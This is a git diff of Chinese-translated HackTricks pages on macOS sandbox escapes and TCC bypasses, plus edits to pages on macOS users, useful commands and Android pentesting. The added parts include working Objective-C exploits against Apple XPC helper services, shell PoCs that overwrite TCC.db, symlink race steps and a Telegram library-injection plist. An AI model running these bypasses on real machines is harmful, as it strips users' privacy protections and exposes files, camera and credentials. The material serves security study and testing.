[NSXPCInterface interfaceWithProtocol:@protocol(AudioAnalyticsHelperServiceProtocol)]; +[conn resume]; + +[[conn remoteObjectProxy] createZipAtPath:currentPath hourThreshold:0 withReply:^(id *error){ +NSDirectoryEnumerator *dirEnum = [[[NSFileManager alloc] init] enumeratorAtPath:currentPath]; +NSString *file; +while ((file = [dirEnum nextObject])) { +if ([[file pathExtension] isEqualToString: @"zip"]) { +// open the zip +NSString *cmd = [@"open " stringByAppendingString:file]; +system([cmd UTF8String]); + +sleep(3); // wait for decompression and then open the payload (poc.app) +NSString *cmd2 = [NSString stringWithFormat:@"open /Users/%@/Downloads/%@/poc.app", NSUserName(), [file stringByDeletingPathExtension]]; +system([cmd2 UTF8String]); +break; +} +} +}]; +} +``` +#### /System/Library/PrivateFrameworks/WorkflowKit.framework/XPCServices/ShortcutsFileAccessHelper.xpc + +此 XPC 服务允许通过方法 `extendAccessToURL:completion:` 为 XPC 客户端提供对任意 URL 的读写访问,该方法接受任何连接。由于 XPC 服务具有 FDA,因此可以滥用这些权限以完全绕过 TCC。 + +漏洞是: +```objectivec +@protocol WFFileAccessHelperProtocol +- (void) extendAccessToURL:(NSURL *) url completion:(void (^) (FPSandboxingURLWrapper *, NSError *))arg2; +@end +typedef int (*PFN)(const char *); +void expoit_ShortcutsFileAccessHelper(NSString *target) { +[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/WorkflowKit.framework"]load]; +NSXPCConnection * conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.WorkflowKit.ShortcutsFileAccessHelper"]; +conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(WFFileAccessHelperProtocol)]; +[conn.remoteObjectInterface setClasses:[NSSet setWithArray:@[[NSError class], objc_getClass("FPSandboxingURLWrapper")]] forSelector:@selector(extendAccessToURL:completion:) argumentIndex:0 ofReply:1]; +[conn resume]; + +[[conn remoteObjectProxy] extendAccessToURL:[NSURL fileURLWithPath:target] completion:^(FPSandboxingURLWrapper *fpWrapper, NSError *error) { +NSString *sbxToken = [[NSString alloc] initWithData:[fpWrapper scope] encoding:NSUTF8StringEncoding]; +NSURL *targetURL = [fpWrapper url]; + +void *h = dlopen("/usr/lib/system/libsystem_sandbox.dylib", 2); +PFN sandbox_extension_consume = (PFN)dlsym(h, "sandbox_extension_consume"); +if (sandbox_extension_consume([sbxToken UTF8String]) == -1) +NSLog(@"Fail to consume the sandbox token:%@", sbxToken); +else { +NSLog(@"Got the file R&W permission with sandbox token:%@", sbxToken); +NSLog(@"Read the target content:%@", [NSData dataWithContentsOfURL:targetURL]); +} +}]; +} +``` ### 静态编译与动态链接 -[**这项研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) 发现了两种绕过沙箱的方法。因为沙箱是在用户空间中应用的,当 **libSystem** 库被加载时。如果一个二进制文件能够避免加载它,它将永远不会被沙箱化: +[**这项研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) 发现了绕过沙箱的两种方法。因为沙箱是在用户空间中应用的,当 **libSystem** 库被加载时。如果一个二进制文件能够避免加载它,它将永远不会被沙箱化: - 如果二进制文件是 **完全静态编译** 的,它可以避免加载该库。 -- 如果 **二进制文件不需要加载任何库**(因为链接器也在 libSystem 中),它将不需要加载 libSystem。 +- 如果 **二进制文件不需要加载任何库**(因为链接器也在 libSystem 中),它就不需要加载 libSystem。 ### Shellcodes -请注意 **即使是 shellcodes** 在 ARM64 中也需要链接到 `libSystem.dylib`: +请注意,**即使是 shellcodes** 在 ARM64 中也需要链接到 `libSystem.dylib`: ```bash ld -o shell shell.o -macosx_version_min 13.0 ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64 ``` -### Entitlements +### 不继承的限制 -请注意,即使某些 **操作** 可能在沙箱中被 **允许**,如果应用程序具有特定的 **权限**,例如: +正如**[这篇文章的附加内容](https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/)**中所解释的,沙箱限制如: +``` +(version 1) +(allow default) +(deny file-write* (literal "/private/tmp/sbx")) +``` +可以通过一个新进程执行来绕过,例如: +```bash +mkdir -p /tmp/poc.app/Contents/MacOS +echo '#!/bin/sh\n touch /tmp/sbx' > /tmp/poc.app/Contents/MacOS/poc +chmod +x /tmp/poc.app/Contents/MacOS/poc +open /tmp/poc.app +``` +然而,当然,这个新进程不会从父进程继承权限或特权。 + +### 权限 + +请注意,即使某些 **操作** 可能在沙箱中 **被允许**,如果应用程序具有特定的 **权限**,例如: ```scheme (when (entitlement "com.apple.security.network.client") (allow network-outbound (remote ip)) @@ -163,7 +324,7 @@ Sandbox Bypassed! ``` ### 使用 lldb 调试和绕过沙箱 -让我们编译一个应该被沙箱保护的应用程序: +让我们编译一个应该被沙箱化的应用程序: {{#tabs}} {{#tab name="sand.c"}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md index 50e36f9f3..4900691c9 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -6,7 +6,7 @@ ### 写入绕过 -这不是一个绕过,这只是 TCC 的工作方式:**它不保护写入**。如果终端 **没有权限读取用户的桌面,它仍然可以写入**: +这不是一个绕过,这只是 TCC 的工作方式:**它不防止写入**。如果终端 **没有权限读取用户的桌面,它仍然可以写入**: ```shell-session username@hostname ~ % ls Desktop ls: Desktop: Operation not permitted @@ -16,18 +16,18 @@ ls: Desktop: Operation not permitted username@hostname ~ % cat Desktop/lalala asd ``` -**扩展属性 `com.apple.macl`** 被添加到新 **文件** 以便给 **创建者应用** 访问读取它的权限。 +**扩展属性 `com.apple.macl`** 被添加到新 **文件** 中,以便 **创建者应用** 访问读取它。 ### TCC ClickJacking -可以 **在 TCC 提示上放置一个窗口**,使用户 **接受** 而不注意。你可以在 [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** 中找到一个 PoC。** +可以 **在 TCC 提示上放置一个窗口**,使用户 **接受** 而不注意。您可以在 [**TCC-ClickJacking**](https://github.com/breakpointHQ/TCC-ClickJacking)** 中找到一个 PoC。**

https://github.com/breakpointHQ/TCC-ClickJacking/raw/main/resources/clickjacking.jpg

### TCC 请求任意名称 攻击者可以 **创建任何名称的应用**(例如 Finder、Google Chrome...)在 **`Info.plist`** 中,并使其请求访问某些 TCC 保护的位置。用户会认为是合法应用在请求此访问。\ -此外,可以 **从 Dock 中移除合法应用并将假应用放上去**,因此当用户点击假应用(可以使用相同的图标)时,它可能会调用合法应用,请求 TCC 权限并执行恶意软件,使用户相信合法应用请求了访问。 +此外,可以 **从 Dock 中移除合法应用并将假应用放上去**,因此当用户点击假应用(可以使用相同的图标)时,它可以调用合法应用,请求 TCC 权限并执行恶意软件,使用户相信合法应用请求了访问。
@@ -37,32 +37,32 @@ asd ../../../macos-privilege-escalation.md {{#endref}} -### SSH 绕过 +### SSH Bypass -默认情况下,通过 **SSH 的访问曾经具有 "完全磁盘访问"**。为了禁用此功能,你需要将其列出但禁用(从列表中移除不会删除这些权限): +默认情况下,通过 **SSH 的访问曾经具有 "完全磁盘访问"**。为了禁用此功能,您需要将其列出但禁用(从列表中移除不会删除这些权限): ![](<../../../../../images/image (1077).png>) -在这里你可以找到一些 **恶意软件如何能够绕过此保护** 的示例: +在这里,您可以找到一些 **恶意软件如何能够绕过此保护** 的示例: - [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/) > [!CAUTION] -> 请注意,现在要能够启用 SSH,你需要 **完全磁盘访问** +> 请注意,现在要启用 SSH,您需要 **完全磁盘访问** ### 处理扩展 - CVE-2022-26767 -属性 **`com.apple.macl`** 被赋予文件,以便给 **某个应用程序读取它的权限。** 当 **拖放** 文件到应用程序上,或当用户 **双击** 文件以使用 **默认应用程序** 打开时,会设置此属性。 +属性 **`com.apple.macl`** 被赋予文件,以便给 **某个应用程序读取它的权限。** 当 **拖放** 文件到应用程序上,或当用户 **双击** 文件以使用 **默认应用** 打开时,会设置此属性。 因此,用户可以 **注册一个恶意应用** 来处理所有扩展,并调用 Launch Services 来 **打开** 任何文件(因此恶意文件将被授予读取权限)。 ### iCloud -权限 **`com.apple.private.icloud-account-access`** 使得与 **`com.apple.iCloudHelper`** XPC 服务进行通信成为可能,该服务将 **提供 iCloud 令牌**。 +权限 **`com.apple.private.icloud-account-access`** 可以与 **`com.apple.iCloudHelper`** XPC 服务进行通信,该服务将 **提供 iCloud 令牌**。 **iMovie** 和 **Garageband** 拥有此权限以及其他允许的权限。 -有关从该权限 **获取 iCloud 令牌** 的漏洞的更多 **信息**,请查看演讲:[**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=_6e2LhmxVc0) +有关利用该权限 **获取 iCloud 令牌** 的更多 **信息**,请查看演讲:[**#OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula**](https://www.youtube.com/watch?v=_6e2LhmxVc0) ### kTCCServiceAppleEvents / 自动化 @@ -74,11 +74,11 @@ asd macos-apple-scripts.md {{#endref}} -例如,如果一个应用对 `iTerm` 具有 **自动化权限**,例如在这个例子中 **`Terminal`** 对 iTerm 具有访问权限: +例如,如果一个应用对 **`iTerm`** 具有 **自动化权限**,例如在这个例子中 **`Terminal`** 对 iTerm 具有访问权限:
-#### 通过 iTerm +#### 在 iTerm 上 没有 FDA 的 Terminal 可以调用具有 FDA 的 iTerm,并利用它执行操作: ```applescript:iterm.script @@ -112,10 +112,10 @@ do shell script "rm " & POSIX path of (copyFile as alias) ### CVE-2020–9934 - TCC -用户空间的 **tccd daemon** 使用 **`HOME`** **env** 变量从以下位置访问 TCC 用户数据库: **`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** +用户空间的 **tccd daemon** 使用 **`HOME`** **env** 变量从以下位置访问 TCC 用户数据库:**`$HOME/Library/Application Support/com.apple.TCC/TCC.db`** 根据 [这篇 Stack Exchange 文章](https://stackoverflow.com/questions/135688/setting-environment-variables-on-os-x/3756686#3756686) 和因为 TCC daemon 是通过 `launchd` 在当前用户的域中运行的,所以可以 **控制传递给它的所有环境变量**。\ -因此,**攻击者可以在 `launchctl` 中设置 `$HOME` 环境** 变量指向一个 **受控** **目录**,**重启** **TCC** daemon,然后 **直接修改 TCC 数据库** 以赋予自己 **所有可用的 TCC 权限**,而无需提示最终用户。\ +因此,**攻击者可以在 `launchctl` 中设置 `$HOME` 环境** 变量指向一个 **受控** **目录**,**重启** **TCC** daemon,然后 **直接修改 TCC 数据库** 以使自己获得 **所有可用的 TCC 权限**,而无需提示最终用户。\ PoC: ```bash # reset database just in case (no cheating!) @@ -157,7 +157,7 @@ Notes 可以访问 TCC 保护的位置,但当创建一个笔记时,这个笔 ### CVE-2023-38571 - 音乐与电视 -**`Music`** 有一个有趣的功能:当它运行时,它会 **导入** 被拖放到 **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** 的文件到用户的 "媒体库"。此外,它调用类似于:**`rename(a, b);`** 的操作,其中 `a` 和 `b` 是: +**`Music`** 有一个有趣的功能:当它运行时,它会将拖放到 **`~/Music/Music/Media.localized/Automatically Add to Music.localized`** 的文件 **导入** 到用户的 "媒体库" 中。此外,它调用类似于:**`rename(a, b);`** 的操作,其中 `a` 和 `b` 是: - `a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"` - `b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3` @@ -166,12 +166,12 @@ Notes 可以访问 TCC 保护的位置,但当创建一个笔记时,这个笔 ### SQLITE_SQLLOG_DIR - CVE-2023-32422 -如果 **`SQLITE_SQLLOG_DIR="path/folder"`**,基本上意味着 **任何打开的数据库都会被复制到该路径**。在这个 CVE 中,这个控制被滥用以 **写入** 一个 **SQLite 数据库**,该数据库将被一个具有 FDA 的进程打开 TCC 数据库,然后滥用 **`SQLITE_SQLLOG_DIR`**,在文件名中使用 **符号链接**,因此当该数据库被 **打开** 时,用户的 **TCC.db 被覆盖** 为打开的那个。\ +如果 **`SQLITE_SQLLOG_DIR="path/folder"`**,基本上意味着 **任何打开的数据库都会被复制到该路径**。在这个 CVE 中,这个控制被滥用以 **写入** 一个 **SQLite 数据库**,该数据库将被 **一个具有 FDA 的进程打开 TCC 数据库**,然后滥用 **`SQLITE_SQLLOG_DIR`**,在文件名中使用 **符号链接**,因此当该数据库被 **打开** 时,用户的 **TCC.db 被覆盖** 为打开的那个。\ **更多信息** [**在写作中**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **和**[ **在演讲中**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s)。 ### **SQLITE_AUTO_TRACE** -如果环境变量 **`SQLITE_AUTO_TRACE`** 被设置,库 **`libsqlite3.dylib`** 将开始 **记录** 所有的 SQL 查询。许多应用程序使用这个库,因此可以记录它们所有的 SQLite 查询。 +如果环境变量 **`SQLITE_AUTO_TRACE`** 被设置,库 **`libsqlite3.dylib`** 将开始 **记录** 所有的 SQL 查询。许多应用程序使用了这个库,因此可以记录它们所有的 SQLite 查询。 多个 Apple 应用程序使用这个库来访问 TCC 保护的信息。 ```bash @@ -193,16 +193,16 @@ launchctl setenv SQLITE_AUTO_TRACE 1 这并不安全,因为它必须 **分别解析旧路径和新路径**,这可能需要一些时间,并且可能容易受到竞争条件的影响。有关更多信息,您可以查看 `xnu` 函数 `renameat_internal()`。 > [!CAUTION] -> 所以,基本上,如果一个特权进程正在从您控制的文件夹重命名,您可能会获得 RCE 并使其访问不同的文件,或者像在这个 CVE 中那样,打开特权应用程序创建的文件并存储一个 FD。 +> 所以,基本上,如果一个特权进程正在从您控制的文件夹中重命名,您可能会获得 RCE 并使其访问不同的文件,或者像这个 CVE 中一样,打开特权应用程序创建的文件并存储一个 FD。 > -> 如果重命名访问一个您控制的文件夹,同时您已修改源文件或拥有其 FD,您可以将目标文件(或文件夹)更改为指向一个符号链接,这样您就可以随时写入。 +> 如果重命名访问您控制的文件夹,而您已修改源文件或拥有其 FD,您可以将目标文件(或文件夹)更改为指向一个符号链接,这样您就可以随时写入。 这是 CVE 中的攻击:例如,要覆盖用户的 `TCC.db`,我们可以: - 创建 `/Users/hacker/ourlink` 指向 `/Users/hacker/Library/Application Support/com.apple.TCC/` - 创建目录 `/Users/hacker/tmp/` - 设置 `MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db` -- 通过运行带有此 env 变量的 `Music` 来触发漏洞 +- 通过运行带有此 env 变量的 `Music` 触发漏洞 - 捕获 `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX` 的 `open()`(X 是随机的) - 在这里我们也 `open()` 这个文件以进行写入,并保持文件描述符 - 原子性地在 `/Users/hacker/tmp` 和 `/Users/hacker/ourlink` 之间切换 **在一个循环中** @@ -250,20 +250,20 @@ TCC 在用户的 HOME 文件夹中使用数据库来控制特定于用户的资 ## 通过进程注入 -有不同的技术可以在进程内部注入代码并滥用其 TCC 权限: +有不同的技术可以将代码注入到进程中并滥用其 TCC 权限: {{#ref}} ../../../macos-proces-abuse/ {{#endref}} 此外,发现的最常见的通过 TCC 的进程注入是通过 **插件(加载库)**。\ -插件通常是以库或 plist 形式存在的额外代码,将被 **主应用程序加载** 并在其上下文中执行。因此,如果主应用程序具有对 TCC 限制文件的访问(通过授予的权限或权利),**自定义代码也将具有访问权限**。 +插件通常是以库或 plist 形式存在的额外代码,将被 **主应用程序加载** 并在其上下文中执行。因此,如果主应用程序具有访问 TCC 限制文件的权限(通过授予的权限或权利),**自定义代码也将具有这些权限**。 ### CVE-2020-27937 - Directory Utility -应用程序 `/System/Library/CoreServices/Applications/Directory Utility.app` 具有 **`kTCCServiceSystemPolicySysAdminFiles`** 权限,加载了扩展名为 **`.daplug`** 的插件,并且 **没有经过强化** 的运行时。 +应用程序 `/System/Library/CoreServices/Applications/Directory Utility.app` 具有权限 **`kTCCServiceSystemPolicySysAdminFiles`**,加载了扩展名为 **`.daplug`** 的插件,并且 **没有经过强化** 的运行时。 -为了武器化此 CVE,**`NFSHomeDirectory`** 被 **更改**(滥用之前的权限),以便能够 **接管用户的 TCC 数据库** 以绕过 TCC。 +为了武器化此 CVE,**`NFSHomeDirectory`** 被 **更改**(滥用先前的权限),以便能够 **接管用户的 TCC 数据库** 以绕过 TCC。 有关更多信息,请查看 [**原始报告**](https://wojciechregula.blog/post/change-home-directory-and-bypass-tcc-aka-cve-2020-27937/)。 @@ -346,7 +346,7 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox Telegram具有权限**`com.apple.security.cs.allow-dyld-environment-variables`**和**`com.apple.security.cs.disable-library-validation`**,因此可以滥用它以**获取其权限**,例如使用相机录制。您可以[**在写作中找到有效载荷**](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)。 -注意如何使用环境变量加载库,**创建了一个自定义plist**来注入此库,并使用**`launchctl`**来启动它: +注意如何使用env变量加载库,**创建了一个自定义plist**来注入此库,并使用**`launchctl`**来启动它: ```xml @@ -382,9 +382,9 @@ launchctl load com.telegram.launcher.plist ### 终端脚本 -在技术人员使用的计算机上,给终端 **完全磁盘访问 (FDA)** 是很常见的。而且可以使用它调用 **`.terminal`** 脚本。 +在技术人员使用的计算机上,给终端 **完全磁盘访问 (FDA)** 是很常见的。并且可以使用它调用 **`.terminal`** 脚本。 -**`.terminal`** 脚本是 plist 文件,例如这个文件,其中包含在 **`CommandString`** 键中要执行的命令: +**`.terminal`** 脚本是 plist 文件,例如这个文件,其中包含在 **`CommandString`** 键中执行的命令: ```xml @@ -463,7 +463,15 @@ os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/") os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db") os.system("hdiutil detach /tmp/mnt 1>/dev/null") ``` -检查**完整的利用**在[**原始写作**](https://theevilbit.github.io/posts/cve-2021-30808/)中。 +检查**完整利用**在[**原始写作**](https://theevilbit.github.io/posts/cve-2021-30808/)中。 + +### CVE-2024-40855 + +正如在[原始写作](https://www.kandji.io/blog/macos-audit-story-part2)中解释的,这个CVE利用了`diskarbitrationd`。 + +公共`DiskArbitration`框架中的函数`DADiskMountWithArgumentsCommon`执行了安全检查。然而,可以通过直接调用`diskarbitrationd`来绕过它,因此可以在路径中使用`../`元素和符号链接。 + +这使得攻击者能够在任何位置进行任意挂载,包括由于`diskarbitrationd`的权限`com.apple.private.security.storage-exempt.heritable`而覆盖TCC数据库。 ### asr @@ -471,7 +479,7 @@ os.system("hdiutil detach /tmp/mnt 1>/dev/null") ### 位置服务 -在**`/var/db/locationd/clients.plist`**中有一个第三个TCC数据库,用于指示被允许**访问位置服务**的客户端。\ +在**`/var/db/locationd/clients.plist`**中有第三个TCC数据库,以指示允许**访问位置服务**的客户端。\ 文件夹**`/var/db/locationd/`没有受到DMG挂载的保护**,因此可以挂载我们自己的plist。 ## 通过启动应用 diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md index a18c0782c..4b3045b3c 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-users.md @@ -1,35 +1,33 @@ -# macOS Users & External Accounts +# macOS 用户与外部账户 {{#include ../../banners/hacktricks-training.md}} -## Common Users +## 常见用户 -- **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_": +- **Daemon**: 保留给系统守护进程的用户。默认的守护进程账户名称通常以“\_”开头: - ```bash - _amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs - ``` - -- **Guest**: Account for guests with very strict permissions +```bash +_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs +``` +- **Guest**: 访客账户,权限非常严格 ```bash state=("automaticTime" "afpGuestAccess" "filesystem" "guestAccount" "smbGuestAccess") for i in "${state[@]}"; do sysadminctl -"${i}" status; done; ``` - -- **Nobody**: Processes are executed with this user when minimal permissions are required +- **Nobody**: 当需要最小权限时,以此用户执行进程 - **Root** -## User Privileges +## 用户权限 -- **Standard User:** The most basic of users. This user needs permissions granted from an admin user when attempting to install software or perform other advanced tasks. They are not able to do it on their own. -- **Admin User**: A user who operates most of the time as a standard user but is also allowed to perform root actions such as install software and other administrative tasks. All users belonging to the admin group are **given access to root via the sudoers file**. -- **Root**: Root is a user allowed to perform almost any action (there are limitations imposed by protections like System Integrity Protection). - - For example root won't be able to place a file inside `/System` +- **标准用户**:最基本的用户。此用户在尝试安装软件或执行其他高级任务时需要管理员用户授予的权限。他们无法独立完成这些操作。 +- **管理员用户**:大多数时候作为标准用户操作,但也被允许执行根操作,例如安装软件和其他管理任务。所有属于管理员组的用户**通过sudoers文件获得root访问权限**。 +- **Root**:Root是一个被允许执行几乎任何操作的用户(受系统完整性保护等保护措施的限制)。 +- 例如,root无法将文件放置在`/System`内 -## External Accounts +## 外部账户 -MacOS also support to login via external identity providers such as FaceBook, Google... The main daemon performing this job is `accountsd` (`/System/Library/Frameworks/Accounts.framework//Versions/A/Support/accountsd`) and it's possible to find plugins used for external authentication inside the folder `/System/Library/Accounts/Authentication/`.\ -Moreover, `accountsd` gets the list of account types from `/Library/Preferences/SystemConfiguration/com.apple.accounts.exists.plist`. +MacOS还支持通过外部身份提供者登录,例如FaceBook、Google... 执行此工作的主要守护进程是`accountsd`(`/System/Library/Frameworks/Accounts.framework//Versions/A/Support/accountsd`),可以在文件夹`/System/Library/Accounts/Authentication/`中找到用于外部身份验证的插件。\ +此外,`accountsd`从`/Library/Preferences/SystemConfiguration/com.apple.accounts.exists.plist`获取账户类型列表。 {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-useful-commands.md b/src/macos-hardening/macos-useful-commands.md index 53e6dc36e..1bdb2df8e 100644 --- a/src/macos-hardening/macos-useful-commands.md +++ b/src/macos-hardening/macos-useful-commands.md @@ -1,15 +1,14 @@ -# macOS Useful Commands +# macOS 有用命令 {{#include ../banners/hacktricks-training.md}} -### MacOS Automatic Enumeration Tools +### MacOS 自动枚举工具 - **MacPEAS**: [https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) - **Metasploit**: [https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum_osx.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/gather/enum_osx.rb) - **SwiftBelt**: [https://github.com/cedowens/SwiftBelt](https://github.com/cedowens/SwiftBelt) -### Specific MacOS Commands - +### 特定的 MacOS 命令 ```bash #System info date @@ -111,25 +110,21 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist (enable ssh) sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist (disable ssh) #Start apache sudo apachectl (start|status|restart|stop) - ##Web folder: /Library/WebServer/Documents/ +##Web folder: /Library/WebServer/Documents/ #Remove DNS cache dscacheutil -flushcache sudo killall -HUP mDNSResponder ``` +### 已安装的软件和服务 -### Installed Software & Services - -Check for **suspicious** applications installed and **privileges** over the.installed resources: - +检查安装的**可疑**应用程序和对已安装资源的**权限**: ``` system_profiler SPApplicationsDataType #Installed Apps system_profiler SPFrameworksDataType #Instaled framework lsappinfo list #Installed Apps launchctl list #Services ``` - -### User Processes - +### 用户进程 ```bash # will print all the running services under that particular user domain. launchctl print gui/ @@ -140,10 +135,9 @@ launchctl print system # will print detailed information about the specific launch agent. And if it’s not running or you’ve mistyped, you will get some output with a non-zero exit code: Could not find service “com.company.launchagent.label” in domain for login launchctl print gui//com.company.launchagent.label ``` +### 创建用户 -### Create a user - -Without prompts +无提示
diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index cdd551c87..3d52dcfe2 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -1,46 +1,31 @@ -# Android Applications Pentesting +# Android 应用程序渗透测试 {{#include ../../banners/hacktricks-training.md}} -
+## Android 应用程序基础 -加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流! - -**Hacking Insights**\ -参与深入探讨黑客的刺激与挑战的内容 - -**Real-Time Hack News**\ -通过实时新闻和见解,跟上快速变化的黑客世界 - -**Latest Announcements**\ -了解最新的漏洞赏金发布和重要平台更新 - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并立即与顶级黑客合作! - -## Android Applications Basics - -强烈建议您开始阅读此页面,以了解与 Android 安全性和 Android 应用程序中最危险组件相关的 **最重要部分**: +强烈建议您开始阅读此页面,以了解与 Android 安全性相关的 **最重要部分和 Android 应用程序中最危险的组件**: {{#ref}} android-applications-basics.md {{#endref}} -## ADB (Android Debug Bridge) +## ADB (Android 调试桥) 这是您连接到 Android 设备(模拟或物理)所需的主要工具。\ -**ADB** 允许通过 **USB** 或 **Network** 从计算机控制设备。此工具使得 **双向复制** 文件、**安装** 和 **卸载** 应用程序、**执行** shell 命令、**备份** 数据、**读取** 日志等功能成为可能。 +**ADB** 允许从计算机通过 **USB** 或 **网络** 控制设备。此工具使 **文件** 双向 **复制**、**安装** 和 **卸载** 应用程序、**执行** shell 命令、**备份** 数据、**读取** 日志等功能成为可能。 -查看以下 [**ADB Commands**](adb-commands.md) 列表,了解如何使用 adb。 +查看以下 [**ADB 命令**](adb-commands.md) 列表,以了解如何使用 adb。 ## Smali 有时修改 **应用程序代码** 以访问 **隐藏信息**(可能是经过良好混淆的密码或标志)是很有趣的。然后,反编译 apk、修改代码并重新编译可能会很有趣。\ -[**在本教程中**,您可以 **学习如何反编译 APK、修改 Smali 代码并使用新功能重新编译 APK**](smali-changes.md)。这在 **动态分析** 期间作为 **多项测试的替代方案** 将非常有用。然后,**始终记住这个可能性**。 +[**在本教程中**,您可以 **学习如何反编译 APK、修改 Smali 代码并使用新功能重新编译 APK**](smali-changes.md)。这在 **动态分析** 中作为 **多项测试的替代方案** 将非常有用。然后,**始终记住这个可能性**。 -## Other interesting tricks +## 其他有趣的技巧 -- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md) -- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd) +- [在 Play 商店中伪装您的位置](spoofing-your-location-in-play-store.md) +- **下载 APK**: 